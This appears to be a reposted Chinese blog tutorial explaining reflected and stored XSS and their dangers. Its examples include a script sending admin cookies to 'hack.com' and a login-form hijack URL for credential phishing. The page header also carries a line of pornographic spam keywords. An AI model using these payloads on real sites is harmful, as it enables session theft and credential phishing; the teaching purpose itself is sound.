日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

谈论XSS

發布時間:2025/5/22 编程问答 38 豆豆
生活随笔 收集整理的這篇文章主要介紹了 谈论XSS 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

XSS?叫跨站腳本攻擊(Cross Site Script),那么XSS原本應該叫做CSS,但是由于CSS的簡稱已經被連級樣式表?使用了,所以就換個稱謂XSS。

為什么叫做跨站腳本攻擊呢?

它的意思就是在別人的網站上嵌入腳本,而這個腳本原本不是屬于這個網站的。這個解釋很直觀吧。

怎么嵌入腳本呢?

比如這么個搜索結果頁,當用戶搜索test的時候,頁面會顯示“搜索關鍵詞:test”

這個時候,這里的test就很有可能會出現xss漏洞,如果該頁面是直接將用戶輸入的東西“返回”到頁面上,那么存在的xss漏洞就可以這樣利用:

輸入:<script>alert(1);</scrip>

那么頁面就會跳出alert(1);

這種XSS叫做反射性XSS。

?

再談論另外一種場景,每個網站都有反饋框。允許用戶反饋數據給后臺。

而這個后臺一般都是管理員進行審核,會在管理后臺展示。

如果一個<script>var x=new Image(); x.src=”http://hack.com?cookie=”+document.cookie;</script>的反饋數據由用戶輸入

然后這個數據“直接”返回到管理后臺上,那么這個時候,管理后臺管理員的cookie就被作為參數傳遞到http://hack.com?了。后面黑客就可以使用cookie來做登錄管理后臺了。

這種XSS由于攻擊代碼存儲進數據庫了,所以叫做存儲型XSS。

危害

一般來說,存儲型XSS的危害性大于反射型XSS。因為反射型XSS只會影響到自己,而存儲型的XSS可能會影響到網站的其他用戶。

XSS可以如上面例子說的:

1 盜取cookie

2 釣魚

比如我將一段代碼注入進某個網站的支付頁面,這段js代碼做的事情是,動態控制這個支付頁面的Form表單,比如將這個form表單的html替換成目標網站一個相似的html。

或者另一個案例是使用反射型XSS,我預先生成一個url,這個url是一個有反射型xss漏洞的頁面。比如document.getElementById(“loginForm”).action=”http://hack.com”http://weibo.com/login?username=<script>document.getElementById(“loginForm”).action=”http://hack.com”</script> ,然后我將這個頁面通過qq的群郵件發給qq群中的所有人,一旦有人點擊這個鏈接,那么就會進入微博登陸頁,萬一再輸入用戶名密碼,那么這個人的用戶名密碼就會被盜了。當然,這個案例有個問題,url太假了,怎么辦?短鏈接服務?,F在有很多廠商提供了短連接的服務。那么最后的鏈接是實際看不出來問題的。

3 DDOS攻擊

當然這個前提是有大量用戶已經被XSS攻擊了,所以他們瀏覽的頁面已經被植入了代碼,這個代碼的作用就是循環向一個網站發送請求,如果有xss漏洞的這個網站是有大量用戶的,比如微博,那么后一個被DDOS攻擊的網站就真心慘了。

總之,XSS的危害就在于網站的頁面可以被隨意嵌入js代碼。

總結

以上是生活随笔為你收集整理的谈论XSS的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。